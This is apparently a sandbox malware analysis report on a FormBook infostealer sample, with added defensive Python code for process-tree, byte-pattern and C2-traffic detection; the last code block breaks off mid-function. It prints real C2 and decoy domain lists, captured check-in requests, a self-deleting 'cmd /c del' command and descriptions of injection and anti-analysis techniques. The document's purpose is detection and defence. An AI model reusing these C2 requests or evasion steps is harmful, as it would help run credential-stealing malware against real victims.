Analysis Report NEW ORDER ELO-05756485.exe

Overview

General Information

Sample Name: NEW ORDER ELO-05756485.exe
Analysis ID: 383983
MD5: ef847f9fc2339b9470150fef1105b5fe
SHA1: eb9b2c97525c2b167d1ae4bdeba308f1c4d9206d
SHA256: 9e54241184e45b1950037313896e0d2e864cc9d373f5a2f14b0af405094fd1a4
Tags: exe, Formbook, Hostgator

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • NEW ORDER ELO-05756485.exe (PID: 6616 cmdline: 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe' MD5: EF847F9FC2339B9470150FEF1105B5FE)
    • NEW ORDER ELO-05756485.exe (PID: 6800 cmdline: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe MD5: EF847F9FC2339B9470150FEF1105B5FE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 5656 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 5048 cmdline: /c del 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
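The tree above is the whole execution chain in five lines: the sample re-launches its own image (PID 6800, the child that the "process hollowing" and "creates a process in suspended mode" signatures refer to), the payload migrates into explorer.exe, explorer then starts a SysWOW64 binary (colorcpl.exe) that carries the final stage, and that binary runs cmd.exe /c del against the original file. One caveat when turning this into a detection: the sandbox nests explorer.exe under the sample because of the injection, not because the sample is its parent; in an EDR log explorer's parent is the normal logon chain, so a rule has to key on explorer spawning an argument-less SysWOW64 binary that itself spawns cmd.exe, and on cmd.exe deleting a file that an earlier process in the log executed from. The following is an added example, not part of the Joe Sandbox report: process-creation events constructed from the tree (PIDs, images and command lines are the report's; the field names, the parent PID 1000 for the first process and the explorer.exe image path are assumptions), with the three checks just described.

```python
"""Detect the FormBook chain from the report's process tree.

Added example: events are constructed to mirror the Startup tree, using a
Sysmon-like schema (pid, ppid, image, cmdline) that is an assumption.
"""
import ntpath
import re

# Constructed events. PIDs, images and command lines come from the report;
# ppid 1000 for the first process and the explorer.exe path are assumed.
EVENTS = [
    {"pid": 6616, "ppid": 1000,
     "image": r"C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe",
     "cmdline": r"'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe'"},
    {"pid": 6800, "ppid": 6616,
     "image": r"C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe",
     "cmdline": r"C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe"},
    {"pid": 5656, "ppid": 3440,
     "image": r"C:\Windows\SysWOW64\colorcpl.exe",
     "cmdline": r"C:\Windows\SysWOW64\colorcpl.exe"},
    {"pid": 5048, "ppid": 5656,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe'"},
    {"pid": 5812, "ppid": 5048,
     "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]
# explorer.exe was already running; the tree shows it only because the
# payload was injected into it. Model it as a known process, not as a child.
PREEXISTING = {3440: r"C:\Windows\explorer.exe"}

# cmd.exe /c del <path>, with or without quotes around the path.
DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<path>[^'"]+?)['"]?\s*$""", re.IGNORECASE)


def _base(path):
    """Lower-cased file name of a Windows path (empty for None)."""
    return ntpath.basename(path or "").lower()


def detect(events, preexisting):
    images = dict(preexisting)
    images.update({e["pid"]: e["image"] for e in events})
    # Images executed from user-writable locations: candidate samples.
    user_images = {e["image"].lower() for e in events if "\\users\\" in e["image"].lower()}
    findings = []
    for e in events:
        image = e["image"].lower()
        parent_image = images.get(e["ppid"])
        # 1. A user-directory binary re-launching its own image: the staging
        #    step that precedes hollowing the child (PID 6800 here).
        if parent_image and parent_image.lower() == image and image in user_images:
            findings.append(("self_reexecution", e["pid"]))
        # 2. cmd.exe deleting a path that some process in the log ran from,
        #    launched by a system binary rather than by the sample itself.
        m = DEL_RE.search(e["cmdline"])
        if _base(e["image"]) == "cmd.exe" and m and m.group("path").lower() in user_images:
            findings.append(("self_deletion_via_cmd", e["pid"], _base(parent_image)))
        # 3. explorer.exe -> SysWOW64 binary -> cmd.exe (colorcpl.exe here).
        if _base(parent_image) == "explorer.exe" and "\\syswow64\\" in image:
            children = [c for c in events if c["ppid"] == e["pid"]]
            if any(_base(c["image"]) == "cmd.exe" for c in children):
                findings.append(("injected_explorer_to_lolbin_to_cmd", e["pid"]))
    return findings


def run():
    return detect(EVENTS, PREEXISTING)


if __name__ == "__main__":
    for finding in run():
        print(finding)
```

Check 2 deliberately does not require the deleting process to be a descendant of the sample: after the hop through explorer.exe there is no parent link left to follow, which is exactly why the path-based correlation is needed.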

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dingolope.com/riai/"], "decoy": ["856380892.xyz", "goproteinz.com", "girigratis.com", "4schwuleautoren.com", "artofwrestlingicons.com", "miles4moms.com", "tamiigun.com", "noritamoneyconsultants.net", "blacklionllc.net", "elevictory.com", "happinessmail.com", "thymocide.net", "123goimmo.com", "advocate4deaf.com", "lovelyforum.net", "rentlondonapartment.com", "weinsureplanes.com", "tagfqjxf.icu", "thewellbeingsutra.com", "enibo-official.com", "gammacake.com", "flyingshiitake.com", "heryay.com", "myonlinereturns.com", "goodxweb.com", "soukefu.com", "stuntmemorabilia.net", "ourlivesinchristmatters.com", "capslock-europe.com", "trannghiason.com", "makeproductcool.com", "siezubehor.com", "architeizer.com", "smartwisecapital.info", "mybuildingneeds.com", "jumlasx.xyz", "theclevergoalie.com", "polvodeoro.com", "wheretofindmarina.com", "learningfitbit.com", "buyanijuan.com", "aplusdrilling.com", "dulcification-comforter.info", "bjkjrd.com", "dehaochu.com", "jaceandjenelle.com", "upperish.com", "asociadosresidenciales.com", "timedoesnote082703.xyz", "hackinson.com", "3d3366.com", "harringtonstoowoomba.com", "amandawilsonsolutions.com", "skipbinsplus.com", "plataformacampeao.com", "sleepasana.com", "pinupcasino-start.site", "chamosgt.com", "3pisbd.com", "yourbesttacolife.com", "synaptictalent.com", "controlservicesreport.com", "westrenworld.com", "watertomato.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed beneath each row)
00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x92880:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x92afa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xbf0a0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xbf31a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9e61d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0xcae3d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x9e109:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0xca929:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x9e71f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0xcaf3f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x9e897:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xcb0b7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93512:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xbfd32:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x9d384:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xc9ba4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9420b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xc0a2b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xa448f:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xd0caf:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xa5492:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(15 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author (matched strings listed beneath each row)
2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17619:$sqlite3step: 68 34 1C 7B E1
  • 0x1772c:$sqlite3step: 68 34 1C 7B E1
  • 0x17648:$sqlite3text: 68 38 2A 90 C5
  • 0x1776d:$sqlite3text: 68 38 2A 90 C5
  • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE entry not shown)
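Two things in these tables are worth reading rather than skimming. First, $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) decodes to add ecx, eax / rdtsc / sub eax, ecx / mov [ebp-4], eax: a timestamp-counter delta stored to a local, which is the "Tries to detect virtualization through RDTSC time measurements" behaviour from the signature list showing up as a static byte pattern. Second, the hit offsets are consistent across artefacts: every string sits at the same offset in the raw memory dump and in the .raw.unpack, and exactly 0xE00 lower in the rebuilt .unpack (0x8ae8 vs 0x98e8, 0x14885 vs 0x15685, 0x17619 vs 0x18419), which is what you expect when the same image is written out with file-aligned rather than memory-aligned sections; in the explorer.exe dump at 0x39D3000 each string appears twice at bases 0x2C820 apart, i.e. two copies of the payload. The block below is an added example, not the report's and not the rule authors' code: it reproduces only the hex strings printed above under the names the rules give them, scans a constructed buffer for them, and decodes the JPCERT strings as push imm32. The match conditions (any three yara-signator sequences, or all three JPCERT constants) are assumptions for the demo; the real rules' conditions are not on this page.

```python
"""Scan a buffer for the byte sequences the report's YARA rules hit on.

Added example. Only the hex strings shown in the report are reproduced;
the match conditions below are assumed, not the original rules' conditions.
"""
import struct

# Strings from the yara-signator rule Formbook_1, as printed in the report.
SIGNATOR = {
    "sequence_0": bytes.fromhex("03C80F312BC18945FC"),          # add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax
    "sequence_1": bytes.fromhex("3C240F8476FFFFFF3C257494"),
    "sequence_2": bytes.fromhex("3B4F14739585C97491"),
    "sequence_3": bytes.fromhex("3C6975448B7D188B0F"),
    "sequence_4": bytes.fromhex("5DC38D507C80FA07"),
    "sequence_5": bytes.fromhex("0FBE5C0E010FB6540E0283E30FC1EA06"),
    "sequence_6": bytes.fromhex("578945FC8945F48945F8"),
    "sequence_7": bytes.fromhex("66890C025B8BE55D"),
    "sequence_8": bytes.fromhex("3C5474043C7475F4"),
    "sequence_9": bytes.fromhex("5668030100008D8595FEFFFF6A00"),
}
# Strings from the JPCERT/CC rule: each is a `push imm32` (opcode 0x68).
JPCERT = {
    "sqlite3step": bytes.fromhex("68341C7BE1"),
    "sqlite3text": bytes.fromhex("68382A90C5"),
    "sqlite3blob": bytes.fromhex("6853D87F8C"),
}


def find_all(buf, pat):
    """All (possibly overlapping) offsets of pat in buf."""
    offs, i = [], buf.find(pat)
    while i != -1:
        offs.append(i)
        i = buf.find(pat, i + 1)
    return offs


def scan(buf, strings):
    """name -> list of offsets, for every string that occurs at least once."""
    hits = {name: find_all(buf, pat) for name, pat in strings.items()}
    return {name: offs for name, offs in hits.items() if offs}


def verdict(buf):
    sig = scan(buf, SIGNATOR)
    jp = scan(buf, JPCERT)
    return {
        "signator_hits": sig,
        "jpcert_hits": jp,
        "formbook_1": len(sig) >= 3,     # assumed condition
        "jpcert_formbook": len(jp) == 3,  # assumed condition
    }


def push_immediates(strings=JPCERT):
    """Decode `push imm32` strings to the little-endian constant they push."""
    return {n: struct.unpack("<I", p[1:5])[0] for n, p in strings.items() if p[0] == 0x68}


def build_sample():
    """Constructed buffer: NOP filler with a few sequences planted at known offsets."""
    buf = bytearray(b"\x90" * 0x200)
    buf[0x10:0x10 + 9] = SIGNATOR["sequence_0"]
    buf[0x80:0x80 + 9] = SIGNATOR["sequence_0"]   # the report also shows it twice
    buf[0x100:0x100 + 12] = SIGNATOR["sequence_1"]
    buf[0x140:0x140 + 8] = SIGNATOR["sequence_7"]
    for i, pat in enumerate(JPCERT.values()):
        buf[0x180 + i * 8:0x180 + i * 8 + 5] = pat
    return bytes(buf)


if __name__ == "__main__":
    print(verdict(build_sample()))
    print({k: hex(v) for k, v in push_immediates().items()})
```

For real scanning use yara-python against the dumps; the point of the hand-rolled scan is to see what each string is before trusting it, and the push-immediate decode (0xE17B1C34, 0xC5902A38, 0x8C7FD853) shows why the JPCERT strings are robust: they are constants the code pushes, which survive relocation, unlike absolute addresses.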

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.jumlasx.xyz/riai/ | Avira URL Cloud: Label: malware
Source: http://www.jumlasx.xyz | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.dingolope.com/riai/"], "decoy": ["856380892.xyz", "goproteinz.com", "girigratis.com", "4schwuleautoren.com", "artofwrestlingicons.com", "miles4moms.com", "tamiigun.com", "noritamoneyconsultants.net", "blacklionllc.net", "elevictory.com", "happinessmail.com", "thymocide.net", "123goimmo.com", "advocate4deaf.com", "lovelyforum.net", "rentlondonapartment.com", "weinsureplanes.com", "tagfqjxf.icu", "thewellbeingsutra.com", "enibo-official.com", "gammacake.com", "flyingshiitake.com", "heryay.com", "myonlinereturns.com", "goodxweb.com", "soukefu.com", "stuntmemorabilia.net", "ourlivesinchristmatters.com", "capslock-europe.com", "trannghiason.com", "makeproductcool.com", "siezubehor.com", "architeizer.com", "smartwisecapital.info", "mybuildingneeds.com", "jumlasx.xyz", "theclevergoalie.com", "polvodeoro.com", "wheretofindmarina.com", "learningfitbit.com", "buyanijuan.com", "aplusdrilling.com", "dulcification-comforter.info", "bjkjrd.com", "dehaochu.com", "jaceandjenelle.com", "upperish.com", "asociadosresidenciales.com", "timedoesnote082703.xyz", "hackinson.com", "3d3366.com", "harringtonstoowoomba.com", "amandawilsonsolutions.com", "skipbinsplus.com", "plataformacampeao.com", "sleepasana.com", "pinupcasino-start.site", "chamosgt.com", "3pisbd.com", "yourbesttacolife.com", "synaptictalent.com", "controlservicesreport.com", "westrenworld.com", "watertomato.com"]}
Multi AV Scanner detection for submitted file
Source: NEW ORDER ELO-05756485.exe | Virustotal: Detection: 37%
Source: NEW ORDER ELO-05756485.exe | ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: NEW ORDER ELO-05756485.exe | Joe Sandbox ML: detected
Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: NEW ORDER ELO-05756485.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: NEW ORDER ELO-05756485.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: colorcpl.pdbGCTL | source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393394404.00000000012C0000.00000040.00000001.sdmp
Source: Binary string: colorcpl.pdb | source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393394404.00000000012C0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000003.00000000.378250105.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393436003.00000000012F0000.00000040.00000001.sdmp, colorcpl.exe, 00000008.00000002.599409173.0000000004500000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: NEW ORDER ELO-05756485.exe, colorcpl.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 00000003.00000000.378250105.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_073895B0
Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_07389664
Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_073895A3
Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_0738A370
Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_0738A380

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 23.82.149.10:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 23.82.149.10:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 23.82.149.10:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.dingolope.com/riai/
Source: global traffic | HTTP traffic detected: GET /riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls HTTP/1.1 | Host: www.gammacake.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /riai/?Tj=Ch14F2YiO7tiI9Q2gagIvg9WhlZe2vnmCdhjSvtGFOlHF2WGeYVTjNDjSrDUFLROgZwAm743Yw==&RX=dhutZbdHWPcd4ls HTTP/1.1 | Host: www.dehaochu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /riai/?Tj=E/PQIKV0Y0+pnMQkqAaMyQKNriDG24+7toFV4fvfu7MpK5DYzrWE6NgrfSqNSLRL+NHh7QLO4w==&RX=dhutZbdHWPcd4ls HTTP/1.1 | Host: www.goproteinz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 198.185.159.144
Source: Joe Sandbox View | ASN Name: LEASEWEB-USA-SEA-10US
Source: global traffic | HTTP traffic detected: GET /riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls HTTP/1.1 | Host: www.gammacake.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /riai/?Tj=Ch14F2YiO7tiI9Q2gagIvg9WhlZe2vnmCdhjSvtGFOlHF2WGeYVTjNDjSrDUFLROgZwAm743Yw==&RX=dhutZbdHWPcd4ls HTTP/1.1 | Host: www.dehaochu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /riai/?Tj=E/PQIKV0Y0+pnMQkqAaMyQKNriDG24+7toFV4fvfu7MpK5DYzrWE6NgrfSqNSLRL+NHh7QLO4w==&RX=dhutZbdHWPcd4ls HTTP/1.1 | Host: www.goproteinz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: unknown | DNS traffic detected: queries for: www.gammacake.com
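Note what the captured traffic actually shows: none of the three check-ins went to the one entry the extractor labels as "C2 list"; all three hosts (gammacake.com, dehaochu.com, goproteinz.com) are in the "decoy" list, and all three requests share the /riai/ path, the same two-parameter query shape (a base64-looking blob under Tj, a short alphanumeric value under RX), Connection: close, and no User-Agent header (the "HTTP GET or POST without a user agent" signature). So for blocking and hunting, treat the whole domain list plus the /riai/ path as the indicator set, not the single "C2" entry, and detect on the request shape rather than on any one host. The block below is an added example, not part of the report or of any vendor signature: the requests are constructed from the three captured here plus one benign control, the config dict is the extractor output trimmed to the domains involved, and the shape heuristic (path of 2 to 8 lowercase alphanumerics, exactly two two-letter query keys, base64 alphabet in the first value, no User-Agent) is my description of the observed traffic. One practical caveat is built in: the query is split by hand because urllib's parse_qsl would turn the '+' characters in the blob into spaces.

```python
"""Flag FormBook-style check-ins in HTTP requests and tie them to the config.

Added example. CONFIG is the report's extractor output trimmed to the
domains used below; the requests are constructed from the captured ones.
"""
import re
from urllib.parse import urlsplit

CONFIG = {
    "C2 list": ["www.dingolope.com/riai/"],
    "decoy": ["gammacake.com", "dehaochu.com", "goproteinz.com", "jumlasx.xyz"],
}

# Constructed from the report's captured requests, plus one benign control.
REQUESTS = [
    "GET /riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls HTTP/1.1\r\n"
    "Host: www.gammacake.com\r\nConnection: close\r\n\r\n",
    "GET /riai/?Tj=Ch14F2YiO7tiI9Q2gagIvg9WhlZe2vnmCdhjSvtGFOlHF2WGeYVTjNDjSrDUFLROgZwAm743Yw==&RX=dhutZbdHWPcd4ls HTTP/1.1\r\n"
    "Host: www.dehaochu.com\r\nConnection: close\r\n\r\n",
    "GET /riai/?Tj=E/PQIKV0Y0+pnMQkqAaMyQKNriDG24+7toFV4fvfu7MpK5DYzrWE6NgrfSqNSLRL+NHh7QLO4w==&RX=dhutZbdHWPcd4ls HTTP/1.1\r\n"
    "Host: www.goproteinz.com\r\nConnection: close\r\n\r\n",
    "GET /api/?id=123&v=2 HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n",
]

PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")          # short random directory
KEY_RE = re.compile(r"^[A-Za-z]{2}$")                # two-letter parameter names
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")   # base64 alphabet, padded


def _strip_www(host):
    return host[4:] if host.startswith("www.") else host


def parse_request(raw):
    """Request line and headers of one raw HTTP/1.1 request."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw, config=CONFIG):
    """None if the request does not look like a check-in, else a verdict dict."""
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    if method != "GET" or not PATH_RE.match(url.path):
        return None
    # Split by hand: parse_qsl() would turn '+' into ' ' and percent-decode,
    # corrupting the base64 blob we want to inspect.
    params = [p.partition("=") for p in url.query.split("&") if p]
    if len(params) != 2:
        return None
    (k1, _, v1), (k2, _, v2) = params
    if not (KEY_RE.match(k1) and KEY_RE.match(k2) and B64_RE.match(v1) and v2.isalnum()):
        return None
    if "user-agent" in headers:
        return None
    host = headers.get("host", "").lower()
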